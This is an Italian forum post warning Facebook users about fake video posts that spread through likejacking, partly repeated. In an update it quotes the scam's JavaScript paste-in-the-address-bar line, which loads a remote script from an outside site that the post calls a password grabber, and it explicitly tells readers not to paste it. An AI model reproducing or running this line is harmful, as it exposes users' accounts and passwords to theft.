Ed ecco svelato il nuovo "virus" di Facebook,stiamo parlando dei Video-Fake.
Sembrano dei player contenenti video con il nome di YouTube e un'altro video nuovo di zecca che si chiama VIDE0 .
Hanno un'area innocente,ma su tutte le bacheche c'è ne almeno uno.
E mo come ci salviamo?
Inoltre questi misteriosi video hanno tutti il link del profilo su qui hai visto il link (posizionando il cursore sul video)..
Il funzionamento :
Io non ci ho cliccato mai,ma penso di sapere come agisce :
Condivide sulla bacheca di tutti gli amici,tipo con una frase e il nome.
Non a caso il mio amico l'ha condiviso,e come nome ho Gabry,ed è spuntato Gabry,mentre questo mio amico mi chiama col nome completo.Troviamo un modo di sbarazzarcene,basta solo non premere più play!
A voi la linea.
Aggiornamento!!!!!!!!
Ho trovato sul Web quest'articolo :
Symantec, azienda statunitense produttrice di software antivirus, lancia l’allarme: sempre più filmati sono soggetti a likejacking, applicazioni che portano l’utente a compiere un comportamento non voluto.[h=2][/h][h=2][/h]
Aggiornamento grazie a @MauroTheBest.
Sembrano dei player contenenti video con il nome di YouTube e un'altro video nuovo di zecca che si chiama VIDE0 .
Hanno un'area innocente,ma su tutte le bacheche c'è ne almeno uno.
E mo come ci salviamo?
Inoltre questi misteriosi video hanno tutti il link del profilo su qui hai visto il link (posizionando il cursore sul video)..
Il funzionamento :
Io non ci ho cliccato mai,ma penso di sapere come agisce :
Condivide sulla bacheca di tutti gli amici,tipo con una frase e il nome.
Non a caso il mio amico l'ha condiviso,e come nome ho Gabry,ed è spuntato Gabry,mentre questo mio amico mi chiama col nome completo.Troviamo un modo di sbarazzarcene,basta solo non premere più play!
A voi la linea.
Aggiornamento!!!!!!!!
Ho trovato sul Web quest'articolo :
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
P.S. per tutti quelli che odiano Norton Internet Security vi invito a leggere queste parole citate :Symantec, azienda statunitense produttrice di software antivirus, lancia l’allarme: sempre più filmati sono soggetti a likejacking, applicazioni che portano l’utente a compiere un comportamento non voluto.[h=2][/h][h=2][/h]
Aggiornamento grazie a @MauroTheBest.
Il Video Funziona Così.Clicchi Sul Video, Lo Condivide A 6 Tuoi Amici, Con 6 Video Diversi.Codice PHP:
Il Video Mostra Una Piccola Guida Da Fare, Con Infine Nella Barra Del Browser Incollare Questo Codice JavaScript:
javascripta=(b=document).createElement('script')).src='http://www.cowboysaliensstreaming.com/tag/fb.php',b.body.appendChild(a);void(0)
VOI NON INCOLLATELO!
Se Non Sbaglio Questo Codice Java Serve a Reindirizzare Chiunque Lo Inserisce Nella Barra Del Browser Sul Sito Richiesto Nel Codice.
A Questo Punto Quel Sito è Un Password Grabber, E A Sua Volta Ti Trova I Tuoi Dati.
Ultima modifica: